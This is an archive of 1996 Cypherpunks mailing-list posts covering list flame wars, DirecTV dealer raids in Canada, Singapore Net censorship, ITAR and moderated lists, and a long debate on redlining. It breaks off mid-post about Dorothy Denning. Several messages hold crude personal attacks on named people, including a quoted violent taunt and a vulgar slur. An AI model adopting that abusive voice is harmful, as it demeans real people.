Message-Id: <DZyeyD70w165w@bwalk.dm.com>
Date: Wed, 04 Dec 96 08:22:00 EST
In-Reply-To: <32A579A8.718@earthlink.net>
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Stephen Boursy <boursy@earthlink.net> writes:
> Sandy Sandfort wrote:
> >
> > C'punks,

See punks post. See punks rant. See punks flame. Laugh, laugh, laugh.

> > On Tue, 3 Dec 1996, Dave Hayes wrote:
> >
> >> The very existance of the "profane" keeps the "sacred" in
> >> existance as well. If you cannot see that, then John Grubor's
> >> lesson is wasted on you.
> >
> > If this bit of verbal legerdemain makes any sense at all
> > (Logos?), then Grubor must be personally responsible for the

"Logos" suffers from verbal diarrhea and can only be pitied. Anonymous
cowards like him are the worst enemy of crypto-enhanced privacy.

> > existance of every saint on the Catholic calendar...not.
>
>   Well saints come on go on the Roman Catholic calander--doesn't
> mean a hell of a lot.

We have a Greek Orthodox church of St. Dimitri not too far from here.
They mistakenly think that I'm Greek and send me the same newsletter
they send to everybody else named Dimitri. Some of it is in English,
so I learned quite a bit about the life of the original St. Dimitri:
He was a foul-mouthed Greek who lived in 3rd century CE and got into
trouble for badmouthing the Romans and other Pagans. I suppose he's
an RC saint too. I used to work for the Jesuits - very educational.

He is not to be confused with the Russian St. Dimitri Donskoy who beat the
shit out of the Mongols. That was after the schism, so he's _not RC saint.

>   Dr. Grubor does an excellent job of bring the vermin out of
> the woodwork.

Yes - thank you Dr. Grubor for your fine work.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Wed, 4 Dec 1996 12:18:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <199612031615.KAA03400@manifold.algebra.com>
Message-ID: <32A5DC5B.3411@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


FYI, the search engines that honor an X-No-Archive header also tend to 
skip posts with X-No-Archive: yes as the first line of the body of the 
message.

IMO this is preferable anyway, because it lets your readers know what 
you're doing.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 4 Dec 1996 12:27:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mounties charge dealer over sales of U.S. Dishes
Message-ID: <199612042020.MAA22897@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


By Robert Brehl - Toronto Star Business Reporter 

Canada's satellite wars have heated up with the first dealers of the U.S.
DirecTV dishes being arrested and charged under the federal
Radiocommunication Act.

``Iraq doesn't allow its citizens to have satellite dishes either,'' said Stan
LeBlanc, a dealer in Yarmouth, N.S., who was charged.

``Never thought I'd see the day when 12 or 15 Mounties would storm into
my building because I'm selling things the public wants.''

LeBlanc was charged this week after Royal Canadian Mounted Police
raided his electronics store Nov. 13 and seized 83 access cards for
DirecTV set-top boxes, some computers, cash and two satellite dishes.

The Mounties have raided dozens of satellite dealers from coast-to-coast,
except in Ontario, since June.

Now formally charged are LeBlanc; his father, Ray Sr.; and David Lloyd
Williams.

LeBlanc said the access cards were not the so-called pirate cards that allow
viewers to watch DirecTV programming for free.

The cards seized require customers to have U.S. addresses for DirecTV
bills, he said.

The dealers have been charged with possessing and selling equipment that
decodes encrypted satellite signals.

LeBlanc said he has seven competitors in Yarmouth that also sell U.S.
satellite dishes, and none was charged.

``When they raided me, they even parked in one of my competitor's parking
lots under a sign advertising the 18-inch dishes,'' LeBlanc said.

Last month, Industry Minister John Manley issued a warning to satellite
dealers and TV viewers that selling or using U.S. dishes could be illegal.

Canada is estimated to have more than 200,000 U.S. dishes.

Three Canadian firms have been licensed to offer direct-to-home satellite
service, but none has yet launched.

RCMP officials in Nova Scotia could not be reached last night.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Fisher <leefi@microsoft.com>
Date: Wed, 4 Dec 1996 12:41:03 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Re: Anyone considered adding crypto into Microsoft Outlook?
Message-ID: <c=US%a=_%p=msft%l=RED-09-MSG-961204203428Z-2811@INET-03-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


| The main problem so far seems to be the impenetrability of the 
| MAPI documentation. Does anyone know of a usable reference or 
| which of the gazillion Microsoft Developer network CDs one can 
| find more information?

MAPI is in part of the Win32 SDK, whichi is available on MSDN level 2,
in the \mstools\mapi subdirectory.

http://www.microsoft.com/win32dev/mapi/ is the MAPI home page.

http://www.microsoft.com/win32dev/mapi/internet.htm has some good
MAPI/Exchange resource pointers.

http://www.microsoft.com/msdn/sdk/ is a new site for downloading parts
of the SDK online, but it is just getting started (i.e., i'm not sure
that the MAPI part is ready yet).

as for the other question about Outlook -vs- Exchange, see
http://www.microsoft.com/outlook/documents/emailfs/default.htm for a
comparison.

Lee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 4 Dec 1996 09:40:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Singapore Sling -- A second look, from The Netly News
Message-ID: <Pine.sos5.3.91.961204123912.6251I-100000@cp.pathfinder.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 4 Dec 1996 12:38:28 -0500 (EST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Singapore Sling -- A second look, from The Netly News

The Netly News
http://netlynews.com
December 4, 1996
   
SINGAPORE SLING
By Declan McCullagh (declan@well.com)
   
       Singapore seems to possess no more resolution than some primitive
   VR world. There is no dirt whatsoever, no muss, no furred fractal
   edge to things. Outside, the organic, florid as ever in the tropics,
   has been gardened into brilliant green, and all-too-perfect examples
   of itself.
   
       At least that's what William Gibson wrote about the country in
   Wired magazine three years ago. I'm in Singapore now to find out what's
   happened since then.
   
       Marvin Tay stands at the exit to the airport, waving a copy of the
   December issue of Wired in semaphore, as animated and affable as the
   corridors of the Changi Airtropolis are chilly and sterile. Marvin
   works at Information Frontiers Ltd, a local Internet firm. He's also
   my self-appointed tour guide and critic. "You've developed quite a
   reputation around here," he tells me on the drive into town. To
   Marvin, my criticisms of Singapore in previous columns were too harsh.
   The country is not a police state. Gibson was wrong. Singapore is not
   "Disneyland with a death penalty."
   
       Marvin is one of Singapore's growing number of digerati. Glued to
   his handphone, he tears around the island in a late-model Alfa Romeo
   that, thanks to the astronomical auto taxes, cost him more than I make
   in three years. "The government is basically very paternalistic," he
   says. "Like your government and J. Edgar Hoover in the 1950s." He
   doesn't seem to mind. Business is good. We drive on.
   
       Indeed, Singapore is like the U.S. of four decades ago. It's like
   flying into a kind of twisted central-planning father-knows-best time
   warp. Lining the streets next to such quintessentially American stores
   as Reebok, Esprit and Timberland are government agencies like the
   Board of Film Censors and buildings housing the "Social Development
   Unit" government-run dating service and the "Home Ownership for the
   People Scheme." Yet Singapore is aggressively marketing itself as an
   information city of the future. Data will flow through its
   cyber-byways and as an online hub the nation will prosper as it did as
   a 19th century trading center. At least that's the plan.
   
       Singapore's commitment to free trade is long-standing. Settled by
   the British in 1819, the 585-square kilometer island quickly became
   Fortress Singapore, the empire's key southeast Asia trading post.
   After WWII and independence from the crown came Prime Minister Lee
   Kuan Yew, a censor-happy kind of politico whose accomplishments
   include a ban on jukeboxes. Lee Kuan Yew believes that this tiny
   island-nation prospers best under a blend of economic freedom and
   strict social controls. Political liberty is to be shoved aside in
   favor of strengthening economic muscle. As Ian Buruma writes in a
   recent issue of TIME Asia, now that Asians are in power themselves,
   they endorse the essentially colonial idea that Asian people are not
   yet ready for freedom. The public must become better educated, or
   wealthier, or more disciplined, or more virtuous. The point is that
   for an authoritarian government, people are never ready for freedom,
   not just yet.
   
       The traffic light turns yellow. We screech to a stop. Marvin
   glances at me. "Here we slow down for a yellow light," he explains.
   All is proper. Order is king.
   
       That's why criticizing Singapore is almost too easy. Chaos is
   verboten. Chewing gum sales are prohibited. Sell drugs, you face the
   gallows. Canings are routine. Playboy, Penthouse and Cosmo all are
   banned. (The offending article in Cosmo was the one giving women tips
   on how to commit adultery and not get caught.) Even a recent episode
   of "Friends" was censored. This summer, of course, the Singapore
   Broadcasting Authority (SBA) decided to regulate the Net. Now Internet
   traffic crossing the border must flow through filters blocking sites
   that may cause impure thoughts.
   
       But still. . . People live here. What do they think of this?
   
       In the five days I've spent here so far, at cafes on the
   Boat-quay, in government offices lining Orchard Road and over
   Indonesian oxtail soup, I've learned that netizens in Singapore are
   slightly embarrassed. They don't particularly care for the SBA's regs,
   yet they defend them with the lackluster effort that Americans might
   reserve for justifying the wackier actions of the U.S. Congress.
   "Americans distrust the government," the locals say. "Singaporeans
   don't. You know they'll do it right. The government has a track record
   of success." Small surprise; nobody likes to hear outsiders
   criticizing their culture.
   
       What's more, goes the argument, the SBA has only extended existing
   rules to the Net. "How can we argue for Net freedom without attacking
   the existing laws?" one lawyer asks me. Marvin suggests an answer: you
   can't. "Outwardly, Singaporeans may look like any western people. But
   by culture, by value, they're still Asian," he says.
   
       "Do we look repressed here?" a group of soc.culture.singapore
   denizens asks me. Marvin has driven me to one of the cyber-cafes
   overlooking the waterfront. I rest my $4 lime juice on one of the Sun
   Sparcstation 4s tied into a T-1. "No," I say.
   
       Perhaps it's that wealth, the economic riches so evident in the
   glittering glass-and-steel office towers, that permits Singapore
   cyberians to tolerate broad restrictions on online speech. Or perhaps
   it's the fact that the nation has no First Amendment tradition -- its
   constitution includes explicit provisions for government censorship.
   Besides, the restrictions arguably aren't overly burdensome. Only
   about 100 overseas sites are blocked by the proxy filters, and
   circumventing these automated border police is a snap.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Wed, 4 Dec 1996 12:42:00 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings]
Message-ID: <199612042041.MAA19687@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


SANDY SANDFORT wrote:
> On Tue, 3 Dec 1996, Dave Hayes wrote:
> > The very existance of the "profane" keeps the "sacred" in
> > existance as well. If you cannot see that, then John Grubor's
> > lesson is wasted on you.
> If this bit of verbal legerdemain makes any sense at all 
> (Logos?), then Grubor must be personally responsible for the
> existance of every saint on the Catholic calendar...not.

Now there's an example of properly used logic...not. 

Why didn't you be honest and just say "I don't understand this, please
explain"? This could be because you *want* to be hostile, and you
*want* to produce meaningless flames.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

"A terrorist is someone who has a bomb and doesn't have an air force."
             --some letter-writer in the Manchester Guardian, some years ago




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 4 Dec 1996 09:42:21 -0800 (PST)
To: logos <logos@c2.net>
Subject: Re: your mail
In-Reply-To: <Pine.BSF.3.91.961203220950.7988D-100000@blacklodge.c2.net>
Message-ID: <Pine.SUN.3.91.961204124339.25133A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Dec 1996, logos wrote:

> An anonymous poster wrote:
> 
> >Timothy C[*] May, a product of a* birth, appeared with
> >coathanger through his head.
> 
> >/o)\ Timothy C[*] May
> >\(o/
> 
>      I respectfully ask that the author of this post contact
> me.  I am curious about his or her motives and would
> appreciate it if he or she would address these questions:
>      1) Why are you attacking Tim May?  Has he harmed you in
> some way?
>      2) Do you think such posts harm Tim May or help you in
> some fashion?
>      3) What do you hope to accomplish by these posts?
>      4) Do you favor the use of strong cryptography to
> preserve privacy?
>      5) If Yes, do you think such posts are constructive to
> that end? If No, is it your intent that your posts harm the
> cause of strong cryptography and privacy?
>      6) Why have you chosen to hide your true identity?


Just ignore them - Vulis is on the rag again.  Someone please buy Vulis a 
box of anal tampons so he can calm down.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 4 Dec 1996 14:08:59 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Silence is not assent (re the Vulis nonsense)
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961204214721Z-812@INET-03-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Dale Thorn (in reply to Tim May)

If you, Sandy, and the other offenders *really* want to keep the noise
down, then next time ask John directly for a reply, and if none is
forthcoming, say to the list *once*, "John will not answer up", etc.,
and let the subscribers draw their own conclusions from the silence,
instead of from your inane "defenses".
..........................................................


As for myself, I was not speaking for Gilmore nor defending him when I
added my reply to the discussion.   I brought up an item which others
had overlooked (the fact that Vulis had challenged John to censor him)
as specific reference to include in their judgement of his actions, as
well as illustrating how Vulis had invested a lot of effort in
motivating someone into just such a response.

As I mentioned in another post yesterday, situations like this, where
people overlook elements in an argument, are opportunities for others to
"fill in the blanks" or add commentary to clear up the understanding of
a situation.  It is not unusual for cpunks to post their opinions about
an event on the list.   The cpunks have strong opinions regarding
censorship and there are always arguments about the details of its
impropriety or the place of it in a society; the list is a form of
cyberspatial "virtual" society, and if the concept of censorship vs
private property as it affects the list comes up, it is to be expected
that the ideas will be addressed.

So I (and others as well) were addressing the *ideas* of censorship &
the actions of private property owners, arguing in regard of a more
precise & correct understanding of the principles involved,  as
exemplified by John's actions  -  but not in place of his own
"self-defense" of them.

Frankly, most of the long-time members of the list would not need any
such statements of defense from John in order to appreciate the nature
of the circumstance and the reasoning for his symbolic 'censorship'.

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: whgiii@amaranth.com
Date: Wed, 4 Dec 1996 10:53:37 -0800 (PST)
To: logos <logos@c2.net>
Subject: Wasting your time :)
In-Reply-To: <Pine.BSF.3.91.961204070229.25120B-100000@blacklodge.c2.net>
Message-ID: <199612042011.OAA12269@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.BSF.3.91.961204070229.25120B-100000@blacklodge.c2.net>, on
12/04/96 
   at 07:15 AM, logos <logos@c2.net> said:

>     I have been unfailingly polite to you. Do you have it
>within your character to respond to me in kind?

<sigh> Good 'ol Dimitri :)

What can be said other than Dimitri is Dimitri. He has a long and
colorfull history of this childish behavior not only on the cypherpunks
list but is well know on many of the UseNet Newsgroups.

You may also note that many of the more "colorfull" anonymous postings are
of the same format and most likely can be traced back to our good doctor.

-- 
-----------------------------------------------------------
whgiii@amaranth.com
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Wed, 4 Dec 1996 11:06:14 -0800 (PST)
To: "Michael C Taylor (CSD)" <mctaylor@olympus.mta.ca>
Subject: RE: new mailing list & ITAR
Message-ID: <n1362414138.14155@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


==========>
_______________________________________________________________________________
From: Michael C Taylor (CSD) on Wed, Dec 4, 1996 13:54

On Tue, 3 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Meta-question: if someone posts strong crypto source code to the
> moderated mailing list, can the moderator(s) be prosecuted under ITAR?

The moderator would not prosecuted if the moderator & host machine wasn't 
located in USA and not a USA citizen and if the post was not from USA. 

The poster may be a target if located inside USA or a USA citizen. The 
moderator might be prosecuted if the post originated inside USA or went 
through USA to be exported outside USA & Canada.

Welcome to the rest of the world.

----
Michael C. Taylor <mctaylor@mta.ca>
Programmer, Mount Allison University

<==========

Wouldn't this be the case only if it was a *moderated* list?  If it's 
moderated, the list operator becomes a _publisher_ and is responsible for
it's content.  If it's *unmoderated*, the list operator is a _distributor_
and therefore not responsible for the content his medium provides.  Just 
like how a bookstore isn't responsible for the contents of the books; the
publishers/authors are.  (Well, public opinion may drive a store out of 
town, just like public opinion may kill a listserv...)

My apologies if I'm behind in the times and this decision no longer stands.

PM

#include <standard_disclaimer>
Spyjure@comports.com
http://www.netforward.com/comports/?Spyjure  
Crypto-Anarchy-Security esp. WRT Linux
<It's getting there, anyway...  Work's been taking
 up too much time to update the site as often as I wish>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 4 Dec 1996 12:28:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612042014.AA25633@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 12/4/1996, Matthew J. Miszewski wrote:
>>>I consider it my business also, when people are denied opportunity because
>>>of where they live.
>>
>>Why not simply disagree with me?  You do not believe that people may
>>lend their very own money, earned honestly, to anybody they please.
>
>Actually, I never said that.

You say it below.

>Anyone may.  I may hire only white people (even with the intent not
>to hire others).  I will also pay the consequences.  And if someone
>feels that they need to do this, the teachers of civil disobedience
>indeed state it is their duty to.
>
>Anyone may give their money to whomever they choose.  I was simply stating
>it was morally wrong.
>
>>If you are ashamed of that, change your mind.  If you are not ashamed,
>>proclaim it the world and justify it.
>
>I have never been ashamed of my opinions.  Its just that I never said they
>couldn't do it.  I justify my position as follows:
>
>It is costly to everyone in the state to have areas of under and
>unemployment, poverty and usually high-crime rates.
>
>It is unjust and costly to deny opportunity based upon residence.
>
>It is just and efficient to allow markets to indeed be free instead of
>falsely supporting a certain hegemony based upon residence.
>
>Free and full competition is the only way to achieve a free market.  This
>can only happen when access to capital is equal with regard to worthless
>indicators (race, sex, residence and aga's favorite, sexual orientation).

See, right above there.

If I earned my very own money honestly and I choose to lend it only to
Albanians, you believe that this would be inefficient and, therefore,
forbidden.  In other words, you do not believe that I should be able
to lend money to anybody I please.  You can call it "equal access to
capital" or "denial of opportunity", but the clearest and simplest
description is that you believe I should not be able to lend my money
to whomever I please.  Instead of pretending otherwise, just say "I
believe you should not be able to lend your own money which you earned
honestly to anybody you please.  I believe you should be allowed only
to lend money in these circumstances..."

Of course, non-discrimination is a vague term.  Let's say I lend money
only to people I know.  I only know Albanians.  Am I therefore a
racist in my lending practices?  That is unclear.

Am I racist in my choice of friends?  Perhaps we should make that
illegal.

>I have never suggested that provably bad credit risks should be given money.

What is irksome is that you are talking about Other People's Money and
not your own.  The perspective tends to change when it's your own
savings on the line.

>>>I may also hire whomever I wish, but I would have to pay the
>>>consequences if I happened to discriminate based on a protected class
>>>while doing so.  That is the society in which I live.  If I dont like
>>>it, I try to change it.  Our society is not libertarian.
>>
>>Current policy doesn't matter if we are discussing the wisdom or
>>justice of possible policies.
>
>It does if my argument is that this part of the system *is* just.  I
>realize you disagree, but I am sure you are not dismissing my argument
>out-of-hand.  If you disagree, as you say, then disagree.

Actually, I have trouble following your argument.  Please forgive me
for my limited intelligence.

If you are arguing that the current policy is just, that question is
not related to whether it is the current policy.  But, I suppose you
were just sort of observing on the side something like "oh, and by the
way, this is current policy."

>>It isn't clear to me whether you are discussing policy options or
>>whether one should violate laws one does not like.  When an action is
>>illegal, it is still permissible to discuss its legalization.
>
>I agree.  I am not arguing that we need to withdraw Title VII.  Aparently
>you are?

I do not know what is in Title VII.  Perhaps it would be better to ask
me about particular policies.

>>>There are times when government should intervene.  I believe it
>>>should be as infrequent as possible, but would not want to live in a
>>>society where disinfranchised people have no possible recourse.  Your
>>>choice would apparently be different.
>>
>>Perhaps.  In any event, it is important to understand precisely the
>>mechanisms through which people are disenfranchised, if that is in
>>fact what has happened.  It is also important to understand the
>>ramifications of phrases like "no possible recourse".  To borrow
>>money?  It is safe to say that most poor people should be saving money
>>rather than borrowing it.
>
>Why are you stepping around your opinion?  "...if that is in fact what has
>happened."  Just say it.  You do not believe poor people are
>disenfranchised.

In fact, I am open to the possibility that poor people really are
disenfranchised.  But, if I am to believe that I must hear an
explanation that makes sense to me.  If poor people are poor because
absolutely nobody will do business with them for completely irrational
reasons, that seems extremely unlikely.  Even if most rich people are
able to control their greed just to punish poor people of the wrong
race, which is already hard to believe, you actually have to claim
that they are all this way.

>I understand the ramifications of "no possible recourse".  How should
>poor people save money?

Just like anybody else does.  You watch every penny.  You don't eat
meat.  When you buy food, you buy inexpensive healthy food like
lentils instead of expensive unhealthy food like Coca-Cola and potato
chips.  You do not go to McDonald's.  You walk when you can instead of
taking the bus or you ride a (used) bicycle.  You don't smoke
cigarettes.  You do not buy alcohol.  You do not buy other
recreational drugs.  You buy your clothing used.  You economize on
your living arrangements, perhaps by having a large number of
roomates.  (Note that this is illegal in most cities.  That is a form
of disenfranchisment.)  You do not make long distance calls.  If you
can, you share a phone with other people. etc. etc. etc.

If you know poor people, you will know that few of them do these
things.

Also, you work hard to increase your earnings.  You show up at work on
time every time.  You develop a good work ethic.  You wear clean
professional clothing at work.  You treat your employer and coworkers
with respect.  etc. etc. etc.

Read "Your Money or Your Life" by Joe Dominguez and Vicki Robin.  It
outlines a workable program that all poor people - and quite a few
others - will be able to use to their benefit.

>>>I have not heard serious doubts for a while that redlining occurs.
>>
>>It seems likely that people draw lines around certain areas and decide
>>not to lend money there.  What is less clear is that this is
>>unreasonable.  There may be a few good credit risks in poor
>>neighborhoods.  But, it may just be too much trouble weeding through
>>the others to make it a paying business.
>
>I thought that it didnt matter where people came from as long as the risk
>was low in reality.  Banks weed through the people coming to them from the
>suburbs.  Is it harder for them to see past a red line?  More costly?  How?

If you are going through prospective leads and the number of qualified
people is, say, 10 in 1000, you will make a lot more money than going
through a pool of leads that only has 1 qualified person per 1000.

>>It may also be the case that people lending money are behaving
>>irrationally and drawing lines around neighborhoods for simple racial
>>reasons and for no others.  There is a word for this: opportunity.
>
>It also screws up the market.

But why isn't that good news?  If it's really market inefficiency, why
not exploit it?

>I am glad that you admit that racism is irrational.

A lot of human activity is irrational.

In the case of racism, it is difficult to even define what it is for
the purpose of writing a law under which people are to be prosecuted.
This undermines the rule of law in the United States and opens the way
to abuse and political corruption.  Probably that was the idea.

But, even if it were possible to define precisely what racism is, I
would still believe it should be legal.  There is no accounting for
taste and it is wrong to dictate it to other people when they are
causing no harm to others.

>That is the core as to why the problem doesnt go away.  It is an
>infinite loop.  Current interests wont go there.

Not one?  Absolutely no one?  That's pretty hard to believe.

>Generally, people who understand the problem are without access to
>capital.  They would like to go there.  They cant get capital.  When
>they approach current interests, they wont go there.

Maybe there's something funny about the deal.

>>Bank of America was built by a man who perceived and exploited one
>>such opportunity.  Italian shop keepers in California could not get
>>good banking services for, it turned out, irrational reasons.

>There are a few examples of people who actually realize this as a
>problem/opportunity.  Oddly enough, this point reinforces mine.
>Redlining did exist.  Bank of America realized it and made a lot of
>money.  But it still exists elsewhere.  Why dont business plans
>around the country spring up on venture capitalists desks with an
>approved stamp on them?

More to the point, why isn't Matthew J. Miszewski drooling in
anticipation of all the money he is going to make by recognizing this
glorious opportunity?  Giannini made a tremendous amount of money.

Even if you don't care about money, which is unlikely, think of all
the good you could do once you made that fortune!

>>They don't even have to put the money in for a long
>>time.  Once you've set up a package of mortgages, you can sell them
>>off on the CMO market which is liquid and, I believe, quite
>>colorblind.  The beauty of this scheme is that you can take your
>>profits right away and let other people take on the long term interest
>>rate risk, default risk, and management hassles.  This will make your
>>plan easier to sell to investors.
>
>I agree with you that it is a financially attractive proposition.  At the
>Center for Public Representation where I worked during Law School we
>approached investors.  The ROI was extremely attractive not to mention the
>added "goodwill" in a largely liberal community (I went to Law School in
>Madison, Wisconsin).  No one bit.  Hmm?

Hmmm?  Maybe it was lousy investment in spite of a good ROI number.
Nobody?  Not one person was willing to buy in?  Hardly an endorsement.

>>You might also look into the microlending market.  The idea is to lend
>>poor people small amounts of money (less than $10,000) to start
>>businesses and the like.  The default rates are claimed to be
>>surprisingly low.  I have my doubts, but it sounds as if you do not.
>>Good luck.
>
>Actually, I am very glad you brought it up because I was just going to.
>Microloans are successful not only in this country but in India and around
>the world as well.  The Grammeen Bank initiated its microloan program in
>India by loaning usually less than $100 to individuals.  They fixed up
>their residences or started extremely small businesses.  The default rate
>was less than 5%.  (BTW, the system also encouraged community by a system
>of cyclical neighborhood lending where neighbors took responsibility for
>neighbors).  
>
>Compare this now to people whom banks would generally consider a good risk.
>College Graduates.  Generally, these folks live outside of the red line.
>Good risks right?  What about those nasty student loan default rates?  The
>red lines dont make business sense.

I'm hearing that cash register ringing.  Go for it!

>>>When you are working to make sure all the bills are paid it is a bit
>>>difficult to also build an entirely new socio-economic structure.
>>
>>You don't have to build an entirely new socio-economic structure.  You
>>just have to find some good credit risks, some people with money to
>>lend, and put them together taking a cut for yourself, unless the
>>government has thrown up some obstacles to this.
>
>I wish it were this easy.  Economically depressed areas need new structures
>built.  The current structure adds to the cycle of poverty.  First,
>earnings are low.

Guess rents must be low too, otherwise why live there?  Rents are a
dominant expense for poor people.

>Second, costs are high (Warehouse foodstores dont locate there so
>corner stores become the means of feeding the family ($$$)).

That's easy.  Once a month get ten families together to go to the
nearest warehouse store in the suburbs and stock up on provisions.

Or, one poor family could buy a bunch of stuff every month and sell it
out of their house and save everybody the trip.

Discussions regarding "the cycle of poverty" are usually little more
than litanies of excuses.

>Again, business plans have been presented to no avail.  Even private
>foundation subsidized events were tried.  To no avail.

Gee, you would almost think there was something wrong with the
investment.

I challenge you to put your own money into this venture.  You don't
even have to quit your job to get into the microlending business until
you've built it up to the point where it can support you.

>>If you believe that there is a huge opportunity which the racist banks
>>(i.e., all of them) will not take advantage of, you had better explain
>>why there is nobody anywhere with any capital who wouldn't want to
>>make even more money off poor people.  Can it really be the case that
>>99+% of rich people will run fleeing from such a great opportunity?
>
>I once believed much like you.  I saw an "opportunity" the existance of
>which I could not explain.  It seemed irrational.  And it was.

What I don't understand is why you are not excited by this
opportunity.  You claim there is this gaping hole in the banking
business.  If that is true, whoever exploits it is going to be
unbelievably rich in addition to being a great human being.

My point is not that there is a great opportunity so "somebody
somewhere" will solve the racism problem.  My point is that you
yourself do not believe there is a great opportunity if it involves
money you really care about, i.e. your own.

>Racism is irrational.  As you seem aware (BTW, I applaud you on what
>seems to be an honest degree of care)...

Don't get your hopes up.  I've been poor and I've known many poor
people.  The unpleasant truth is that there are usually reasons why
people are poor.

>>Oh, and speaking of racism, where do wealthy African-Americans invest
>>their money?
>
>Huh?  What is your point?

You are claiming that there are ZERO investors who will invest in this
great opportunity because they are racists.  Contrary to popular
belief, most African-Americans are not poor or even gang members.
There are large numbers of middle class African-Americans and a
smaller number of quite successful African-American businesspeople.

If everybody rich is a racist, go to these people and propose that
they can make money pursuing a business opportunity which they are
uniquely qualified to identify and exploit.

If you are claiming that even African-American investors are
irrationally racist about lending to poor people, you should be
forewarned that I and many other people are going to find that a
little hard to believe.

>>>Everyone can now clamor that it just isnt true.  Banks have never
>>>discriminated.  Its all a big lie.  Whatever.
>>
>>Banks have practiced discrimination, and not just against black
>>people.  They have been able to get away with it.  How?  Because the
>>government has protected the banking guild from competition.
>>
>>If opening a bank were as easy as forming a corporation, you would not
>>see much discrimination, I assure you.  There is no reason why a bank
>>shouldn't be that easy to open.
>
>We agree.  But I feel that a legal elimination of redlining would decrease
>costs to the industry.

Wrong.  Redlining is devilishly difficult to define.  That hurts a
small bank more than any other because they have to figure out how to
comply with the law and defend themselves against the regulators
instead of just borrowing and lending money.  It raises the costs of
banking.  That means it is harder for people to borrow and lend money.
And that, if you care about efficiency, is inefficient.

>>Appeals to the very people who are exploiting you are not likely
>>to meet with success, are they?
>
>If they never did we would still have slavery and only white, adult, male,
>land-owners would vote.  While success is rare, it has prevailed when the
>cause is just.

I hate to admit it, but you do have a point here.

However, the way privacy will be permanently eroded is through laws
called "The Privacy Protection Act" which have clauses allowing the
government to do whatever it wants.  It is disconcerting to have the
government dictating what information you may or may not keep on your
computer or who you may give it to.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 5 Dec 1996 03:33:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <199612040549.VAA06361@abraham.cs.berkeley.edu>
Message-ID: <9612042128.AA00799@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


nobody writes:
>  She is seen as "one of us" because she wrote a book on
>  cryptography.  As a consequence, she is seen as a traitor.
>  I am not endorsing this view.

She didn't just write a book on cryptography, but several books.  She is also  
the Chairperson (eek, PC titles...) of the CS department at Georgetown, a  
very respectable institution, and has taught classes there on cryptology.  She  
has also done research on crytpographic access control to databases and other  
stuff.  So as far as being a cryptologist she is quite learned and should  
deserve respect regardless of her political views.

However, after reviewing the Skipjack algorithm (of course her being invited  
to look at it was certainly due to her anti-strong-crypto-for-the-masses  
views), she said something to the effect of "We looked at it over the weekend  
and couldn't find anything wrong with it, so you should trust it." when she  
knows damned well that you can't evaluate a cypher in three days.  It is for  
this that she no longer deserves respect as a cryptologist.  She basically  
cashed in her reputation-capital to help the U.S. Govt. dupe the American  
